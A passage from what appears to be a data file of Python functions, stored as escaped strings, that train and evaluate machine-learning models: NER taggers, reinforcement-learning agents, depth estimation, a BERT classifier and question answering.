dev_sent.set_pos_feature(pos_model, cfg.window)\n _, dev_contexts, dev_gazet, dev_pos, dev_words = \\\n dev_sent.to_tensor(voca, gazet, cfg.window, cfg.phoneme, cfg.gazet_embed)\n dev_contexts = Variable(dev_contexts, volatile=True)\n dev_gazet = Variable(dev_gazet, volatile=True)\n dev_pos = Variable(dev_pos, volatile=True)\n dev_words = Variable(dev_words, volatile=True)\n if torch.cuda.is_available():\n dev_contexts = dev_contexts.cuda()\n dev_gazet = dev_gazet.cuda()\n dev_pos = dev_pos.cuda()\n dev_words = dev_words.cuda()\n\n outputs = model(dev_contexts, dev_gazet, dev_pos, dev_words)\n\n _, predicts = outputs.max(1)\n dev_sent.compare_label(predicts, voca, measure)\n\n accuracy, f_score = measure.get_score()\n print(file=sys.stderr)\n sys.stderr.flush()\n if not f_scores or f_score > max(f_scores):\n logging.info('==== writing best model: %f ====', f_score)\n model.save(cfg.ckpt_path)\n check_point = CheckPoint(optimizer, model,\n {'iter': iter_, 'loss': loss.data[0],\n 'accuracy': accuracy, 'f-score': f_score})\n check_point.save(cfg.ckpt_path)\n logging.info('check point: %s', check_point)\n best_iter = iter_\n revert = 0\n one_more_thing = True\n accuracies.append(accuracy)\n f_scores.append(f_score)\n logging.info('---- iter: %dk, loss: %f, accuracy: %f, f-score: %f (max: %r) ----',\n iter_ // 1000, losses[-1], accuracy, f_score, max(f_scores))\n\n if cfg.model_dir.exists():\n sum_wrt.add_scalar('loss', losses[-1], iter_ // 1000)\n sum_wrt.add_scalar('accuracy', accuracy, iter_ // 1000)\n sum_wrt.add_scalar('f-score', f_score, iter_ // 1000)\n print('{}\\t{}\\t{}\\t{}'.format(iter_ // 1000, losses[-1], accuracy,\n f_score), file=logf)\n logf.flush()\n\n # revert policy\n if (iter_ - best_iter) > iter_to_rvt:\n revert += 1\n logging.info('==== revert to iter: %dk, revert count: %d ====',\n best_iter // 1000, revert)\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n lrs = []\n for param_group in optimizer.param_groups:\n param_group['lr'] *= (0.9 if one_more_thing else 0.8) ** revert\n lrs.append(param_group['lr'])\n best_iter = iter_\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))\n elif iter_ % 100 == 0:\n print('.', end='', file=sys.stderr)\n sys.stderr.flush()\n\n iter_ += 1\n if revert > cfg.rvt_term and one_more_thing:\n logging.info('==== one more thing, revert to iter: %dk ====', best_iter // 1000)\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n lrs = []\n for param_group in optimizer.param_groups:\n param_group['lr'] *= 10.0\n lrs.append(param_group['lr'])\n best_iter = iter_\n revert = 0\n one_more_thing = False\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))", "def run_epoch(self):\n print(\"Training\")\n self.set_train()\n\n for batch_idx in range(0, self.num_total_batch):\n\n before_op_time = time.time()\n # Choosing the dataloader for training model\n if self.choosing_dataset_to_train_with(batch_idx):\n # Synthetic dataset\n self.syn_or_real = 'syn'\n try:\n inputs = self.syn_train_iter.__next__()\n except StopIteration:\n print('Stopped as the iteration has reached to the END, and reloading the synthetic dataloader')\n self.syn_train_iter = iter(self.syn_train_loader)\n inputs = self.syn_train_iter.__next__()\n else:\n # Real dataset\n self.syn_or_real = 'real'\n try:\n inputs = self.real_train_iter.__next__()\n except StopIteration:\n print('Stopped as the iteration has reached to the END, and reloading the real dataloader')\n self.real_train_iter = iter(self.real_train_loader)\n inputs = self.real_train_iter.__next__()\n\n # Move all available tensors to GPU memory\n for key, ipt in inputs.items():\n if type(key) == tuple or key == \"depth_gt\":\n inputs[key] = ipt.to(self.device)\n\n # log less frequently after the first 2000 steps to save time & disk space\n self.step += 1\n self.early_phase = batch_idx % self.opt.log_frequency == 0\n self.mid_phase = False and self.step % self.opt.save_frequency == 0\n self.late_phase = self.num_total_batch - 1 == batch_idx\n\n outputs, losses = {}, {}\n # Depth estimation\n outputs_d, losses_d = self.process_batch(inputs)\n outputs.update(outputs_d)\n losses.update(losses_d)\n\n # No more if else conditions, just combine all losses based on availability of gradients\n final_loss = torch.tensor(0.).to(self.device)\n for k, v in losses.items():\n if ('d_' not in k) and v.requires_grad and ('/' not in k):\n final_loss += v\n final_loss.backward()\n losses[\"loss\"] = final_loss\n\n if (batch_idx + 1) % 2 == 0:\n self.model_optimizer.step()\n self.model_optimizer.zero_grad()\n self.zero_grad()\n\n duration = time.time() - before_op_time\n self.log_time(batch_idx, duration, losses[\"loss\"].cpu().data)\n\n if \"depth_gt\" in inputs:\n self.compute_depth_losses(inputs, outputs, losses)\n\n if self.early_phase or self.mid_phase or self.late_phase:\n self.log(\"train\", inputs, outputs, losses)\n self.val(\"real\")\n self.val(\"syn\")\n\n if (batch_idx + 1) % 2 == 0:\n current_lr = self.update_learning_rate(self.model_optimizer, self.opt.learning_rate)", "def train_step(self):\n # Sample training batch from replay\n training_batch = self.replay.sample(self.batch_size)\n\n # Calculate target Q values for each example:\n # For non-terminal states, targetQ is estimated according to\n # targetQ = r + gamma*Q'(s',max_a Q(s',a))\n # where Q' denotes the target network.\n # For terminating states the target is computed as\n # targetQ = r\n updates = []\n for exp in training_batch:\n start,_,reward,end = exp\n if(self.dampen_states):\n # To dampen states (usually done after major patches or when the meta shifts)\n # we replace winning rewards with 0.\n reward = 0.\n state_code = end.evaluate()\n if(state_code==DraftState.DRAFT_COMPLETE or state_code in DraftState.invalid_states):\n # Action moves to terminal state\n updates.append(reward)\n else:\n # Follwing double DQN paper (https://arxiv.org/abs/1509.06461).\n # Action is chosen by online network, but the target network is used to evaluate this policy.\n # Each row in predicted_Q gives estimated Q(s',a) values for all possible actions for the input state s'.\n feed_dict = {self.ddq_net.online_ops[\"input\"]:[end.format_state()],\n self.ddq_net.online_ops[\"valid_actions\"]:[end.get_valid_actions()]}\n predicted_action = self.ddq_net.sess.run(self.ddq_net.online_ops[\"prediction\"], feed_dict=feed_dict)[0]\n\n feed_dict = {self.ddq_net.target_ops[\"input\"]:[end.format_state()]}\n predicted_Q = self.ddq_net.sess.run(self.ddq_net.target_ops[\"outQ\"], feed_dict=feed_dict)\n\n updates.append(reward + self.ddq_net.discount_factor*predicted_Q[0,predicted_action])\n\n # Update online net using target Q\n # Experience replay stores action = (champion_id, position) pairs\n # these need to be converted into the corresponding index of the input vector to the Qnet\n actions = np.array([start.get_action(*exp[1]) for exp in training_batch])\n targetQ = np.array(updates)\n feed_dict = {self.ddq_net.online_ops[\"input\"]:np.stack([exp[0].format_state() for exp in training_batch],axis=0),\n self.ddq_net.online_ops[\"actions\"]:actions,\n self.ddq_net.online_ops[\"target\"]:targetQ,\n self.ddq_net.online_ops[\"dropout_keep_prob\"]:0.5}\n _ = self.ddq_net.sess.run(self.ddq_net.online_ops[\"update\"],feed_dict=feed_dict)", "def train(self):\n # Change directory to the code directory\n current_working_directory = os.getcwd()\n\n os.chdir(self.model_parameters[\"NN_code_directory\"])\n\n self.call_training_routine()\n\n # Come back to the original directory\n os.chdir(current_working_directory)", "def _train(self):\n training_environment = self._training_environment\n evaluation_environment = self._evaluation_environment\n policy = self._policy\n pool = self._pool\n\n if not self._training_started:\n self._init_training()\n\n self._initial_exploration_hook(\n training_environment, self._initial_exploration_policy, pool)\n\n self.sampler.initialize(training_environment, policy, pool)\n\n gt.reset_root()\n gt.rename_root('RLAlgorithm')\n gt.set_def_unique(False)\n\n self._training_before_hook()\n\n for self._epoch in gt.timed_for(range(self._epoch, self._n_epochs)):\n self._epoch_before_hook()\n gt.stamp('epoch_before_hook')\n\n start_samples = self.sampler._total_samples\n for i in count():\n samples_now = self.sampler._total_samples\n self._timestep = samples_now - start_samples\n\n if (samples_now >= start_samples + self._epoch_length\n and self.ready_to_train):\n break\n\n self._timestep_before_hook()\n gt.stamp('timestep_before_hook')\n\n self._do_sampling(timestep=self._total_timestep)\n gt.stamp('sample')\n\n if self.ready_to_train:\n self._do_training_repeats(timestep=self._total_timestep)\n gt.stamp('train')\n\n self._timestep_after_hook()\n gt.stamp('timestep_after_hook')\n\n training_paths = self.sampler.get_last_n_paths(math.ceil(self._epoch_length / self.sampler._max_path_length))\n gt.stamp('training_paths')\n evaluation_paths = self._evaluation_paths(policy, evaluation_environment)\n gt.stamp('evaluation_paths')\n\n training_metrics = self._evaluate_rollouts(training_paths, training_environment)\n gt.stamp('training_metrics')\n if evaluation_paths:\n evaluation_metrics = self._evaluate_rollouts(\n evaluation_paths, evaluation_environment)\n gt.stamp('evaluation_metrics')\n else:\n evaluation_metrics = {}\n\n self._epoch_after_hook(training_paths)\n gt.stamp('epoch_after_hook')\n\n sampler_diagnostics = self.sampler.get_diagnostics()\n\n diagnostics = self.get_diagnostics(\n iteration=self._total_timestep,\n batch=self._evaluation_batch(),\n training_paths=training_paths,\n evaluation_paths=evaluation_paths)\n\n time_diagnostics = gt.get_times().stamps.itrs\n\n diagnostics.update(OrderedDict((\n *(\n (f'evaluation/{key}', evaluation_metrics[key])\n for key in sorted(evaluation_metrics.keys())\n ),\n *(\n (f'training/{key}', training_metrics[key])\n for key in sorted(training_metrics.keys())\n ),\n *(\n (f'times/{key}', time_diagnostics[key][-1])\n for key in sorted(time_diagnostics.keys())\n ),\n *(\n (f'sampler/{key}', sampler_diagnostics[key])\n for key in sorted(sampler_diagnostics.keys())\n ),\n ('epoch', self._epoch),\n ('timestep', self._timestep),\n ('timesteps_total', self._total_timestep),\n ('train-steps', self._num_train_steps),\n )))\n\n if self._eval_render_kwargs and hasattr(\n evaluation_environment, 'render_rollouts'):\n # TODO(hartikainen): Make this consistent such that there's no\n # need for the hasattr check.\n training_environment.render_rollouts(evaluation_paths)\n\n yield diagnostics\n\n self.sampler.terminate()\n\n self._training_after_hook()\n\n yield {'done': True, **diagnostics}", "def train_and_evaluate(OUTPUT_DIR,do_train = True,do_eval=True):\n\n\t\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 2e-5\n\tNUM_TRAIN_EPOCHS = 5.0\n\n\t#in this steps lr will be low and training will be slow\n\tWARMUP_PROPORTION = 0.1\n\n\n\n\tif os.path.exists(OUTPUT_DIR) and os.listdir(OUTPUT_DIR) and do_train:\n\t\traise ValueError(\"Output directory ({}) already exists and is not empty.\".format(OUTPUT_DIR))\n\tif not os.path.exists(OUTPUT_DIR):\n\t\tos.makedirs(OUTPUT_DIR)\n\t\t\n\t#create train and test data\n\n\ttrain_sents,train_labels,test_sents,test_labels = create_train_test(\"ADE/DRUG-AE.rel\",\"ADE/negative_data_AE.rel\")\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ttokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", do_lower_case=True)\n\n\tif do_train:\n\n\t\ttrain_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(train_sents, train_labels)]\n\t\tnum_train_examples = len(train_examples)\n\n\t\tnum_train_steps = int(math.ceil(num_train_examples / BATCH_SIZE * NUM_TRAIN_EPOCHS))\n\t\tnum_warmup_steps = int(num_train_steps * WARMUP_PROPORTION)\n\n\t\tmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\",num_labels = num_labels)\n\t\tmodel.to(device)\n\n\t\tparam_optimizer = list(model.named_parameters())\n\t\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\t\toptimizer_grouped_parameters = [\n\t\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t\t]\n\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,lr=LEARNING_RATE,warmup=WARMUP_PROPORTION,t_total=num_train_steps)\n\n\t\tglobal_step = 0\n\t\tnb_tr_steps = 0\n\t\ttr_loss = 0\n\n\t\ttrain_features = convert_examples_to_features(\n\t\t\ttrain_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\n\t\tlogger.info(\"***** Running training *****\")\n\t\tlogger.info(\" Num examples = %d\", num_train_examples)\n\t\tlogger.info(\" Batch size = %d\", BATCH_SIZE)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)\n\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n\t\ttrain_sampler = RandomSampler(train_data)\n\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\n\t\tmodel.train()\n\t\t# for name, param in model.named_parameters():\n\t\t# if param.requires_grad:\n\t\t# print(name)\n\t\t# return\n\t\tfor _ in trange(int(NUM_TRAIN_EPOCHS), desc=\"Epoch\"):\n\t\t\ttr_loss = 0\n\t\t\tnb_tr_examples, nb_tr_steps = 0, 0\n\t\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\t\tbatch = tuple(t.to(device) for t in batch)\n\t\t\t\tinput_ids, input_mask, segment_ids, label_id = batch\n\t\t\t\tloss = model(input_ids, segment_ids, input_mask, label_id)\n\t\t\t\tloss.backward()\n\n\t\t\t\ttr_loss += loss.item()\n\t\t\t\tnb_tr_examples += input_ids.size(0)\n\t\t\t\tnb_tr_steps += 1\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\t\t\tprint(tr_loss)\n\n\t\t# Save a trained model and the associated configuration\n\t\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\ttorch.save(model_to_save.state_dict(), output_model_file)\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\twith open(output_config_file, 'w') as f:\n\t\t\tf.write(model_to_save.config.to_json_string())\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)} \n\t\tmodel_config = {\"bert_model\":\"bert-base-uncased\",\"do_lower\":True,\"max_seq_length\":MAX_SEQ_LENGTH,\"num_labels\":num_labels,\"label_map\":label_map}\n\t\tjson.dump(model_config,open(os.path.join(OUTPUT_DIR,\"model_config.json\"),\"w\"))\n\n\telse:\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\tconfig = BertConfig(output_config_file)\n\t\tmodel = BertForSequenceClassification(config, num_labels=num_labels)\n\t\tmodel.load_state_dict(torch.load(output_model_file))\n\n\tmodel.to(device)\n\n\tif do_eval:\n\n\t\tEVAL_BATCH_SIZE = 32\n\n\t\teval_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(test_sents, test_labels)]\n\t\tnum_eval_examples = len(eval_examples)\n\n\t\teval_features = convert_examples_to_features(\n\t\t\teval_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\t\tlogger.info(\"***** Running evaluation *****\")\n\t\tlogger.info(\" Num examples = %d\", num_eval_examples)\n\t\tlogger.info(\" Batch size = %d\", EVAL_BATCH_SIZE)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids) \n\t\t# # Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=EVAL_BATCH_SIZE)\n\t\tmodel.eval()\n\n\t\teval_loss, eval_accuracy = 0, 0\n\t\tnb_eval_steps, nb_eval_examples = 0, 0\n\t\ty_true = []\n\t\ty_pred = []\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)}\n\t\tfor input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\tlabel_ids = label_ids.to(device)\n\n\t\t\twith torch.no_grad():\n\t\t\t\tlogits = model(input_ids, segment_ids, input_mask)\n\t\t\t\t\n\t\t\tlogits = torch.argmax(F.log_softmax(logits,dim=1),dim=1)\n\t\t\tlogits = logits.detach().cpu().numpy()\n\t\t\tlabel_ids = label_ids.to('cpu').numpy()\n\t\t\ty_pred.extend(logits)\n\t\t\ty_true.extend(label_ids)\n\t\tprint(len(y_pred))\n\t\tprint(len(y_true))\n\t\treport = classification_report(y_true, y_pred)\n\t\toutput_eval_file = os.path.join(OUTPUT_DIR, \"eval_results.txt\")\n\t\twith open(output_eval_file, \"w\") as writer:\n\t\t\tlogger.info(\"***** Eval results *****\")\n\t\t\tlogger.info(\"\\n%s\", report)\n\t\t\twriter.write(report)", "def evaluate(self, model, data, vocabs=None, use_concept=False, log_dir=None, embed=None, cur_step=0):\n\n\n eval_limit = 5000\n step_limit = int(eval_limit / self.batch_size)\n\n model.eval()\n\n loss = self.loss\n loss.reset()\n match = 0\n total = 0\n\n device = torch.device('cuda', 0) if torch.cuda.is_available() else None\n batch_iterator = torchtext.data.BucketIterator(\n dataset=data, batch_size=self.batch_size,\n sort=True, sort_key=lambda x: len(x.src),\n device=device, train=False)\n tgt_vocab = data.fields[seq2seq.tgt_field_name].vocab\n src_vocab = data.fields[seq2seq.src_field_name].vocab\n pad = tgt_vocab.stoi[data.fields[seq2seq.tgt_field_name].pad_token]\n\n cnt = 0\n loss_sum = 0\n\n context_corpus = []\n reference_corpus = []\n prediction_corpus = []\n with torch.no_grad():\n for batch in batch_iterator:\n cnt += 1\n input_variables, input_lengths = getattr(batch, seq2seq.src_field_name)\n\n if torch.cuda.is_available():\n input_index = input_variables.cpu().numpy()\n else:\n input_index = input_variables.numpy()\n input_words = [[src_vocab.itos[word] for word in line] for line in input_index]\n context_corpus.extend(input_words)\n\n if use_concept:\n concept, _ = getattr(batch, seq2seq.cpt_field_name)\n else:\n concept = []\n target_variables = getattr(batch, seq2seq.tgt_field_name)\n\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables,\n concept=concept, vocabs=vocabs, use_concept=use_concept)\n # Evaluation\n seqlist = other['sequence']\n reference = []\n prediction = []\n for step, step_output in enumerate(decoder_outputs):\n target = target_variables[:, step + 1]\n loss.eval_batch(step_output.view(target_variables.size(0), -1), target)\n non_padding = target.ne(pad)\n correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().item()\n match += correct\n total += non_padding.sum().item()\n if torch.cuda.is_available():\n pred = seqlist[step].view(-1).cpu().numpy()\n tgt = target.view(-1).cpu().numpy()\n else:\n pred = seqlist[step].view(-1).numpy()\n tgt = target.view(-1).numpy()\n for i in range(len(step_output)):\n target_char = tgt_vocab.itos[tgt[i]]\n pred_char = tgt_vocab.itos[pred[i]]\n if target_char != '<pad>':\n if len(reference) >= i + 1:\n reference[i].append(target_char)\n else:\n reference.append([target_char])\n if pred_char != '<pad>':\n if len(prediction) >= i + 1:\n prediction[i].append(pred_char)\n else:\n prediction.append([pred_char])\n for i in range(len(reference)):\n reference[i] = reference[i][1:]\n prediction[i] = prediction[i][1:]\n reference_corpus.extend([[line] for line in reference])\n prediction_corpus.extend(prediction)\n if cnt > step_limit:\n break\n\n print(\"Corpus BLEU: \", corpus_bleu(reference_corpus, prediction_corpus, smoothing_function=smoothie))\n print(\"Embedding dist: \", embed.eval_embedding(reference_corpus, prediction_corpus))\n print(\"Distinct-1: \", distinct(prediction_corpus, 1))\n print(\"Distinct-2: \", distinct(prediction_corpus, 2))\n\n with open(log_dir + '/log-' + str(cur_step), 'w', encoding='utf-8') as file:\n for i in range(len(reference_corpus)):\n file.write(\"Context: \" + ' '.join(context_corpus[i]) + '\\n')\n file.write(\"Gold: \" + ' '.join(prediction_corpus[i]) + '\\n')\n file.write(\"Response: \" + ' '.join(reference_corpus[i][0]) + '\\n')\n file.write('\\n')\n if total == 0:\n accuracy = float('nan')\n else:\n accuracy = match / total\n\n return loss.get_loss(), accuracy", "def train(net, train_iterator, dev_iterator, vocabs, epoch_num=4, lr=0.002):\n net.train()\n\n criterion = nn.CrossEntropyLoss()\n\n parameters = filter(lambda p: p.requires_grad, net.parameters())\n optimizer = optim.Adamax(parameters, lr=lr)\n\n # Training loop\n for epoch in tqdm(range(epoch_num), total=epoch_num, desc=\"Epoch\"):\n epoch_loss = 0\n # Epoch loop\n for i, batch in tqdm(enumerate(train_iterator), total=len(train_iterator), desc=\"Iteration\"):\n net.train()\n if _DEBUG:\n q = totext(batch.question[0],vocabs[0],batch_first=False)\n d = totext(batch.document[0],vocabs[0],batch_first=False)\n a1 = totext(batch.answer1[0],vocabs[0],batch_first=False)\n a2 = totext(batch.answer2[0],vocabs[0],batch_first=False)\n print(\"* \"*20+\"NEXT\"+\"* \"*20)\n print(d[0])\n print(\"* \" * 20 + \"Question\" + \"* \" * 20)\n print(q[0])\n print(\"* \" * 20 + \"Answers\" + \"* \" * 20)\n print(a1[0])\n print(a2[0])\n\n optimizer.zero_grad()\n out = net(batch)\n loss = criterion(out, batch.correct)\n loss.backward()\n tut.clip_grad_norm_(parameters, 0.5)\n optimizer.step()\n epoch_loss += loss.item()\n\n # At the end of an epoch, evaluate the current performance on the development set\n with torch.no_grad():\n net.eval()\n dev_loss = 0\n j = 0\n correct = 0\n total = 0\n for j, val_batch in enumerate(dev_iterator):\n out = net(val_batch)\n total += val_batch.correct.size(0)\n loss = criterion(out, val_batch.correct)\n dev_loss += loss.item()\n _, pred_indexes = torch.max(out.data, 1)\n correct += (pred_indexes == val_batch.correct).sum().item()\n print('Epoch: {0}, Train loss: {1}, Dev loss: {2}, Dev accuracy: {3}%'.format(\n epoch, epoch_loss/len(train_iterator), dev_loss/(j+1), correct*100/total))", "def train(self):\n tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break", "def run(self):\n def update_logs(summary_writer, episode, reward, loss, epsilon):\n summary_writer.add_scalar('Reward', reward, episode)\n summary_writer.add_scalar('Loss', loss, episode)\n summary_writer.add_scalar('Epsilon', epsilon, episode)\n \n # Print model and init summary_writer\n summary(self.policy_net, (1, self.num_inputs))\n summary_writer = SummaryWriter(log_dir=f'./logs/{self.name}/')\n\n sum_reward = 0\n\n # Run nb_games\n for n in range(self.nb_games):\n\n reward, loss = self._run_one_game()\n\n # Update values and logs\n episode = self.nb_iter_prev + n\n sum_reward += reward\n self.epsilon = max(self.min_epsilon, self.epsilon * self.decay)\n update_logs(summary_writer, episode, reward, loss, self.epsilon)\n \n # Each update_frequency print and update target_net\n if (episode + 1) % self.update_frequency == 0:\n print(f'Episode: {episode + 1}, Epsilon: {self.epsilon}, '\n f'Reward: {reward}, Loss: {loss}, '\n f'Mean reward: {sum_reward/self.update_frequency}.')\n sum_reward = 0\n self._update_target_net()\n\n # End of the training\n self.nb_iter_prev += self.nb_games\n self.save()", "def _run(self):\n if not self.is_train:\n return self.test() \n\n logger.debug(\"Actor {} resuming at Step {}, {}\".format(self.actor_id, \n self.global_step.value(), time.ctime()))\n\n s = self.emulator.get_initial_state()\n \n s_batch = []\n a_batch = []\n y_batch = []\n bonuses = deque(maxlen=100)\n\n exec_update_target = False\n total_episode_reward = 0\n episode_ave_max_q = 0\n episode_over = False\n qmax_down = 0\n qmax_up = 0\n prev_qmax = -10*6\n low_qmax = 0\n ep_t = 0\n \n while (self.global_step.value() < self.max_global_steps):\n # Sync local learning net with shared mem\n self.sync_net_with_shared_memory(self.local_network, self.learning_vars)\n self.save_vars()\n\n rewards = []\n states = []\n actions = []\n local_step_start = self.local_step\n \n while not episode_over:\n logger.debug('steps: {} / {}'.format(self.global_step.value(), self.max_global_steps))\n # Choose next action and execute it\n a, readout_t = self.choose_next_action(s)\n\n new_s, reward, episode_over = self.emulator.next(a)\n total_episode_reward += reward\n\n current_frame = new_s[...,-1]\n bonus = self.density_model.update(current_frame)\n bonuses.append(bonus)\n\n if (self.actor_id == 0) and (self.local_step % 200 == 0):\n bonus_array = np.array(bonuses)\n logger.debug('Mean Bonus={:.4f} / Max Bonus={:.4f}'.format(\n bonus_array.mean(), bonus_array.max()))\n\n # Rescale or clip immediate reward\n # reward = self.rescale_reward(reward + bonus)\n reward = self.rescale_reward(reward)\n ep_t += 1\n \n rewards.append(reward)\n states.append(s)\n actions.append(a)\n \n s = new_s\n self.local_step += 1\n episode_ave_max_q += np.max(readout_t)\n \n global_step, update_target = self.global_step.increment(\n self.q_target_update_steps)\n\n if update_target:\n update_target = False\n exec_update_target = True\n\n if self.local_step % 4 == 0:\n self.batch_update()\n \n self.local_network.global_step = global_step\n\n else:\n mc_returns = list()\n running_total = 0.0\n for r in reversed(rewards):\n running_total = r + self.gamma*running_total\n mc_returns.insert(0, running_total)\n\n mixed_returns = self.cts_eta*np.array(rewards) + (1-self.cts_eta)*np.array(mc_returns)\n\n states.append(new_s)\n episode_length = len(rewards)\n for i in range(episode_length):\n self.replay_memory.append((\n states[i],\n actions[i],\n mixed_returns[i],\n states[i+1],\n i+1 == episode_length))\n\n \n if exec_update_target:\n self.update_target()\n exec_update_target = False\n # Sync local tensorflow target network params with shared target network params\n if self.target_update_flags.updated[self.actor_id] == 1:\n self.sync_net_with_shared_memory(self.target_network, self.target_vars)\n self.target_update_flags.updated[self.actor_id] = 0\n\n s, total_episode_reward, _, ep_t, episode_ave_max_q, episode_over = \\\n self.prepare_state(s, total_episode_reward, self.local_step, ep_t, episode_ave_max_q, episode_over)", "def evaluate():\n log.info('Loading dev data...')\n if args.version_2:\n dev_data = SQuAD('dev', version='2.0')\n else:\n dev_data = SQuAD('dev', version='1.1')\n (_, _), (data_file_name, _) \\\n = dev_data._data_file[dev_data._version][dev_data._segment]\n dev_data_path = os.path.join(dev_data._root, data_file_name)\n\n if args.debug:\n sampled_data = [dev_data[0], dev_data[1], dev_data[2]]\n dev_data = mx.gluon.data.SimpleDataset(sampled_data)\n log.info('Number of records in dev data: %d', len(dev_data))\n\n dev_data_features = preprocess_dataset(\n tokenizer, dev_data, vocab=vocab, max_seq_length=args.max_seq_length,\n doc_stride=args.doc_stride, num_workers=args.num_workers,\n max_query_length=args.max_query_length, load_from_pickle=args.load_pickle,\n feature_file=args.dev_dataset_file)\n\n dev_data_input = convert_full_features_to_input_features(dev_data_features)\n log.info('The number of examples after preprocessing: %d', len(dev_data_input))\n\n dev_dataloader = mx.gluon.data.DataLoader(dev_data_input, batchify_fn=batchify_fn,\n num_workers=4, batch_size=args.test_batch_size,\n shuffle=False, last_batch='keep')\n\n log.info('start prediction')\n\n all_results = collections.defaultdict(list)\n\n epoch_tic = time.time()\n total_num = 0\n for (batch_id, data) in enumerate(dev_dataloader):\n data_list = list(split_and_load(data, ctx))\n for splited_data in data_list:\n example_ids, inputs, token_types, valid_length, p_mask, _, _, _ = splited_data\n total_num += len(inputs)\n outputs = net_eval(inputs, token_types, valid_length, p_mask=p_mask)\n example_ids = example_ids.asnumpy().tolist()\n for c, example_ids in enumerate(example_ids):\n result = RawResultExtended(start_top_log_probs=outputs[0][c].asnumpy().tolist(),\n start_top_index=outputs[1][c].asnumpy().tolist(),\n end_top_log_probs=outputs[2][c].asnumpy().tolist(),\n end_top_index=outputs[3][c].asnumpy().tolist(),\n cls_logits=outputs[4][c].asnumpy().tolist())\n all_results[example_ids].append(result)\n if batch_id % args.log_interval == 0:\n log.info('Batch: %d/%d', batch_id + 1, len(dev_dataloader))\n\n epoch_toc = time.time()\n log.info('Time cost=%2f s, Thoughput=%.2f samples/s', epoch_toc - epoch_tic,\n total_num / (epoch_toc - epoch_tic))\n\n log.info('Get prediction 